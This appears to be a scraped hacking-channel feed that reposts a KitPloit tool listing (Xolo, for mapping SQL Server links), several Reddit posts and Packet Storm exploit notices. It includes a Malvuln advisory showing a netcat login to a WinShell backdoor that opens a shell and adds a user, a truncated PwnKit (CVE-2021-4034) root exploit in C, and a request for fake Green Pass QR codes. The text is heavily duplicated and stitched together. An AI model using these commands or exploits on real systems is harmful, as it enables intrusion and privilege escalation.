Author: ET Lownoise Version: 1.0 Tool to crawl, visualize and interact with SQL server links in a d3 graph (https://www.kitploit.com/search/label/Graph) to help in your red/blue/purple/.../risk assessments pentest (https://www.kitploit.com/search/label/Pentest) hacking (https://www.kitploit.com/search/label/Hacking) team exercises.
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
KitPloit - PenTest & Hacking Tools
Leading source of security tools, hacking tools, cybersecurity and network security. Learn about new tools and updates in one place.
Requirements: Requests==2.18.4
Flask==0.12.2
Json
Pypyodbc
beautifulsoup4==4.6.0
lxml==4.1.0
Example:
pip install pypyodbc
python -m pip install pypyodbc
Install/Run: python main.py ... * Running on http://127.0.0.1:5000/ (Press CTRL+C to quit) - Open your browser http://127.0.0.1:5000/">- Download
- Decompress
- Put it in directory
- Run it
c:\xolo>python main.py
...
* Running on http://127.0.0.1:5000/ (Press CTRL+C to quit)
- Open your browser http://127.0.0.1:5000/
Questions/Suggestions/Bugfixes/Improvements/Contact: Twitter @etlow
License: MIT License
Notes: node will select it a target -When graph displayed right double click in a node will select it a source -Convert button will display the query required based on the shortest path calculated if you want to interact directly with the selected target from the source. -Query button will send your specified query using the shortest path to the target -Query all button will send your specified query using the shortest path to all nodes - The test graph is just for modifiying D3 code in case you want to play with visualization. -Copy data.json file if you want to have a backup of the graph -Modify queries.json if you want to add your own queries -Check the terminal output to follow what Xolo is doing in the background -Be careful with the max (https://www.kitploit.com/search/label/Max) recursion levels and the number of nodes , start low (maybe 2 - 3 levels and max 10 nodes per level) -This was an exercise for me to play and learn some D3 and the need to perform some db links visualizations. For that reason Xolo was made possible by learning and/or modifiying the code of the following individuals: DB links: -Antti Rantasaari ', 'Scott Sutherland "nullbind" -When graph displayed left double click in a node will select it a target
-When graph displayed right double click in a node will select it a source
-Convert button will display the query required based on the shortest path calculated
if you want to interact directly with the selected target from the source.
-Query button will send your specified query using the shortest path to the target
-Query all button will send your specified query using the shortest path to all nodes
- The test graph is just for modifiying D3 code in case you want to play with visualization.
-Copy data.json file if you want to have a backup of the graph
-Modify queries.json if you want to add your own queries
-Check the terminal output to follow what Xolo is doing in the background
-Be careful with the max recursion levels and the number of nodes , star t low
(maybe 2 - 3 levels and max 10 nodes per level)
-This was an exercise for me to play and learn some D3 and the need to perform some db links visualizations.
For that reason Xolo was made possible by learning and/or modifiying the code of the following individuals:
DB links:
-Antti Rantasaari ',
'Scott Sutherland "nullbind" History v1.0 Feb/2020 First release. Support for SQL server.
Download Xolo (https://github.com/etlownoise/xolo)
___________________________
@hacking_Attack
@Hacking_Video
Flask==0.12.2
Json
Pypyodbc
beautifulsoup4==4.6.0
lxml==4.1.0
Example:
pip install pypyodbc
python -m pip install pypyodbc
Install/Run: python main.py ... * Running on http://127.0.0.1:5000/ (Press CTRL+C to quit) - Open your browser http://127.0.0.1:5000/">- Download
- Decompress
- Put it in directory
- Run it
c:\xolo>python main.py
...
* Running on http://127.0.0.1:5000/ (Press CTRL+C to quit)
- Open your browser http://127.0.0.1:5000/
Questions/Suggestions/Bugfixes/Improvements/Contact: Twitter @etlow
License: MIT License
Notes: node will select it a target -When graph displayed right double click in a node will select it a source -Convert button will display the query required based on the shortest path calculated if you want to interact directly with the selected target from the source. -Query button will send your specified query using the shortest path to the target -Query all button will send your specified query using the shortest path to all nodes - The test graph is just for modifiying D3 code in case you want to play with visualization. -Copy data.json file if you want to have a backup of the graph -Modify queries.json if you want to add your own queries -Check the terminal output to follow what Xolo is doing in the background -Be careful with the max (https://www.kitploit.com/search/label/Max) recursion levels and the number of nodes , start low (maybe 2 - 3 levels and max 10 nodes per level) -This was an exercise for me to play and learn some D3 and the need to perform some db links visualizations. For that reason Xolo was made possible by learning and/or modifiying the code of the following individuals: DB links: -Antti Rantasaari ', 'Scott Sutherland "nullbind" -When graph displayed left double click in a node will select it a target
-When graph displayed right double click in a node will select it a source
-Convert button will display the query required based on the shortest path calculated
if you want to interact directly with the selected target from the source.
-Query button will send your specified query using the shortest path to the target
-Query all button will send your specified query using the shortest path to all nodes
- The test graph is just for modifiying D3 code in case you want to play with visualization.
-Copy data.json file if you want to have a backup of the graph
-Modify queries.json if you want to add your own queries
-Check the terminal output to follow what Xolo is doing in the background
-Be careful with the max recursion levels and the number of nodes , star t low
(maybe 2 - 3 levels and max 10 nodes per level)
-This was an exercise for me to play and learn some D3 and the need to perform some db links visualizations.
For that reason Xolo was made possible by learning and/or modifiying the code of the following individuals:
DB links:
-Antti Rantasaari ',
'Scott Sutherland "nullbind" History v1.0 Feb/2020 First release. Support for SQL server.
Download Xolo (https://github.com/etlownoise/xolo)
___________________________
@hacking_Attack
@Hacking_Video
KitPloit - PenTest & Hacking Tools
Leading source of security tools, hacking tools, cybersecurity and network security. Learn about new tools and updates in one place.
hacking: security in practice
Share your fake Green Pass QR codes
Hi!, I'm searching for fake Green Pass QR codes, or funny ones, I don't care if they are valid or not, like this one from hitler.
submitted by /u/Kitsutsuki
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Share your fake Green Pass QR codes
Hi!, I'm searching for fake Green Pass QR codes, or funny ones, I don't care if they are valid or not, like this one from hitler.
submitted by /u/Kitsutsuki
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Share your fake Green Pass QR codes
Hi!, I'm searching for fake Green Pass QR codes, or funny ones, I don't care if they are valid or not, like this one from hitler.
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
Crypto YouTubers Hacked: What Could Have Happened?
https://external-preview.redd.it/B4ESaq_9zH9diQT5hFlUSl8B3FOsudIfJZGOEAPV1tc.jpg?width=640&crop=smart&auto=webp&s=f032472e3e7f5614fe1148ad4be28003f20e89c5 submitted by /u/stanley9528
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Crypto YouTubers Hacked: What Could Have Happened?
https://external-preview.redd.it/B4ESaq_9zH9diQT5hFlUSl8B3FOsudIfJZGOEAPV1tc.jpg?width=640&crop=smart&auto=webp&s=f032472e3e7f5614fe1148ad4be28003f20e89c5 submitted by /u/stanley9528
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Crypto YouTubers Hacked: What Could Have Happened?
Posted in r/hacking by u/stanley9528 • 92 points and 9 comments
hacking: security in practice
d-cord ip grabbers
is d-cord IP grabbing a thing?, someone claimed they got my IP in a voice chat and i was just wondering...
submitted by /u/mjodyy
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
d-cord ip grabbers
is d-cord IP grabbing a thing?, someone claimed they got my IP in a voice chat and i was just wondering...
submitted by /u/mjodyy
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
d-cord ip grabbers
is d-cord IP grabbing a thing?, someone claimed they got my IP in a voice chat and i was just wondering...
Hacking Articles Tips Tricks Videos Tutorials
Photo
Deep Web
We released "The Dark Web Pulse" - our latest findings about what's going under the web
https://b.thumbs.redditmedia.com/NVF9766elQ0RL8J7AcL8Gnx1v4S4mbFGw5pTcx0wIoI.jpg submitted by /u/rangeva
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
We released "The Dark Web Pulse" - our latest findings about what's going under the web
https://b.thumbs.redditmedia.com/NVF9766elQ0RL8J7AcL8Gnx1v4S4mbFGw5pTcx0wIoI.jpg submitted by /u/rangeva
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
We released "The Dark Web Pulse" - our latest findings about...
Posted in r/deepweb by u/rangeva • 3 points and 0 comments
Major Linux PolicyKit security vulnerability uncovered: Pwnkit
https://www.reddit.com/r/redteamsec/comments/sd6d9e/major_linux_policykit_security_vulnerability/
submitted by /u/NOtsoethical (https://www.reddit.com/user/NOtsoethical)
[link] (https://www.zdnet.com/article/major-linux-policykit-security-vulnerability-uncovered-pwnkit/) [comments] (https://www.reddit.com/r/redteamsec/comments/sd6d9e/major_linux_policykit_security_vulnerability/)
___________________________
@hacking_Attack
@Hacking_Video
https://www.reddit.com/r/redteamsec/comments/sd6d9e/major_linux_policykit_security_vulnerability/
submitted by /u/NOtsoethical (https://www.reddit.com/user/NOtsoethical)
[link] (https://www.zdnet.com/article/major-linux-policykit-security-vulnerability-uncovered-pwnkit/) [comments] (https://www.reddit.com/r/redteamsec/comments/sd6d9e/major_linux_policykit_security_vulnerability/)
___________________________
@hacking_Attack
@Hacking_Video
reddit
Major Linux PolicyKit security vulnerability uncovered: Pwnkit
Posted in r/redteamsec by u/NOtsoethical • 1 point and 0 comments
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Polkit pkexec CVE-2021-4034 Local Root
https://3.bp.blogspot.com/-L1ywDwIvHnM/WWlvbqBqi6I/AAAAAAAAIPQ/e-y1sGxHKpMGeO7A8b-5LHWSXrbuRWhUwCLcBGAs/s1600/h73.png
Local privilege escalation root exploit for Polkit's pkexec vulnerability as described in CVE-2021-4034 and known as PwnKit.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Polkit pkexec CVE-2021-4034 Local Root
https://3.bp.blogspot.com/-L1ywDwIvHnM/WWlvbqBqi6I/AAAAAAAAIPQ/e-y1sGxHKpMGeO7A8b-5LHWSXrbuRWhUwCLcBGAs/s1600/h73.png
Local privilege escalation root exploit for Polkit's pkexec vulnerability as described in CVE-2021-4034 and known as PwnKit.
MD5 |
f604c193ceee98f13847ab2cadba22bfDownload
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Polkit pkexec CVE-2021-4034 Local Root
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Exploit Collector
Polkit pkexec Local Privilege Escalation
___________________________
@hacking_Attack
@Hacking_Video
Polkit pkexec Local Privilege Escalation
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Polkit pkexec Local Privilege Escalation
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Backdoor.Win32.WinShell.50 Weak Hardcoded Password
https://3.bp.blogspot.com/-PWecZP4mFlw/WWlvEzu2ALI/AAAAAAAAILE/oNE1-kA8UGAvJ1jZSurfN5UYJhXI-p6VQCLcBGAs/s1600/h134.png
Backdoor.Win32.WinShell.50 malware suffers from a weak hardcoded password vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Backdoor.Win32.WinShell.50 Weak Hardcoded Password
https://3.bp.blogspot.com/-PWecZP4mFlw/WWlvEzu2ALI/AAAAAAAAILE/oNE1-kA8UGAvJ1jZSurfN5UYJhXI-p6VQCLcBGAs/s1600/h134.png
Backdoor.Win32.WinShell.50 malware suffers from a weak hardcoded password vulnerability.
MD5 |
bef88d27106d91a30aaca122335166ecDownload
Discovery / credits: Malvuln - malvuln.com (c) 2022
Original source: https://malvuln.com/advisory/1fd45364073a81ddd707d74ba5d4c121.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln
Threat: Backdoor.Win32.WinShell.50
Vulnerability: Weak Hardcoded Password
Description: The malware listens on TCP port 85 and requires authentication. However, the password "imdabest" is weak, hardcoded in plaintext in the PE file and appears many times in a database of leaked passwords.
Type: PE32
MD5: 1fd45364073a81ddd707d74ba5d4c121
Vuln ID: MVID-2022-0474
Dropped files: "sxe32A3.tmp"
Disclosure: 01/25/2022
Exploit/PoC:
nc64.exe x.x.x.x 85
:imdabest
WinShell v5.0 (C)2002 janker.org
? for help
CMD>?
i Install
r Remove
p Path
b reBoot
d shutDown
s Shell
x eXit
q Quit
Download:
CMD>http://.../srv.exe
? for help
CMD>s
Microsoft Windows [Version 10.0.16299.309]
(c) 2017 Microsoft Corporation. All rights reserved.
c:\dump>whoami
whoami
desktop-2c3kqho\victim
c:\dump>net user hyp3rlinx 666 /add
net user hyp3rlinx 666 /add
The command completed successfully.
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Backdoor.Win32.WinShell.50 Weak Hardcoded Password
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Polkit pkexec CVE-2021-4034 Local Root
https://3.bp.blogspot.com/-PWecZP4mFlw/WWlvEzu2ALI/AAAAAAAAILE/oNE1-kA8UGAvJ1jZSurfN5UYJhXI-p6VQCLcBGAs/s1600/h134.png
Local privilege escalation root exploit for Polkit's pkexec vulnerability as described in CVE-2021-4034 and known as PwnKit. Written in Go.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Polkit pkexec CVE-2021-4034 Local Root
https://3.bp.blogspot.com/-PWecZP4mFlw/WWlvEzu2ALI/AAAAAAAAILE/oNE1-kA8UGAvJ1jZSurfN5UYJhXI-p6VQCLcBGAs/s1600/h134.png
Local privilege escalation root exploit for Polkit's pkexec vulnerability as described in CVE-2021-4034 and known as PwnKit. Written in Go.
MD5 |
271a8e6ede6ade0c32c81eb6c9a1ab8fDownload
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Polkit pkexec CVE-2021-4034 Local Root
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Polkit pkexec CVE-2021-4034 Proof Of Concept
https://3.bp.blogspot.com/-YTa6qox_ltk/WWlvNeWMUbI/AAAAAAAAIMc/0l9a_Kr-MFozVC5jeSwhLNgVZ9cZuXXlQCLcBGAs/s1600/h22.png
Local privilege escalation root exploit for Polkit's pkexec vulnerability as described in CVE-2021-4034. Verified on Debian 10 and CentOS 7. Written in C.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Polkit pkexec CVE-2021-4034 Proof Of Concept
https://3.bp.blogspot.com/-YTa6qox_ltk/WWlvNeWMUbI/AAAAAAAAIMc/0l9a_Kr-MFozVC5jeSwhLNgVZ9cZuXXlQCLcBGAs/s1600/h22.png
Local privilege escalation root exploit for Polkit's pkexec vulnerability as described in CVE-2021-4034. Verified on Debian 10 and CentOS 7. Written in C.
MD5 |
962194925e2d2e27879a466979773a6eDownload
/*
* Proof of Concept for PwnKit: Local Privilege Escalation Vulnerability Discovered in polkit’s pkexec (CVE-2021-4034) by Andris Raugulis pwnkit/gconv-modules");
fp = fopen("pwnkit/pwnkit.c", "w");
fprintf(fp, "%s", shell);
fclose(fp);
system("gcc pwnkit/pwnkit.c -o pwnkit/pwnkit.so -shared -fPIC");
char *env[] = { "pwnkit", "PATH=GCONV_PATH=.", "CHARSET=PWNKIT", "SHELL=pwnkit", NULL };
execve("/usr/bin/pkexec", (char*[]){NULL}, env);
}
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Polkit pkexec CVE-2021-4034 Proof Of Concept
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.